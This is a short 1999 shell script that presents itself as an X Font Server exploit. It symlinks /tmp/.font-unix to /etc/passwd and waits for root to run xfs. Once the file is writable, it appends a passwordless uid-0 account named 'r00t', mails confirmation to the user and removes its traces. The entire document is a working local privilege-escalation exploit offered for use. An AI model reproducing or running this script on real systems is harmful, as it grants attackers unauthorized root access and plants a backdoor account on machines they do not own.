#!/bin/sh
# X Font Server **exploit** 
# ArchAng3| of Death -- Member Of Midgard Security Team
# usage: xfsx &
# the proggie stays in the background checking for write access to 
# /etc/passwd when it haves write access it creates an account and 
# mails back at you.

if [ -f /tmp/.font-unix ]; then
   echo "File already exists..."
   echo "Aborting..."
   exit

else

  echo "Creating symlink to /etc/passwd..."
  ln -s /etc/passwd /tmp/.font-unix
  echo "Symlink created..."
  echo "Now just wait until root executes xfs..."
  while (true); do
   sleep 60;
   if [ -w /etc/passwd ]; then 
     echo "r00t::0:0:r00t:/:/bin/bash" >> /etc/passwd
     echo "0wn3d..." > .xfsxtmp666
     echo `cat /etc/passwd |grep r00t` >> .xfsxtmp666
     echo "su r00t might be a good thing to do ..." >> .xfsxtmp666
     cat .xfsxtmp666 |mail `whoami`
     rm -f .xfsxtmp666
     rm -f /tmp/.font-unix
     exit
   fi; 
   done  
fi
#                    www.hack.co.za              [1999]#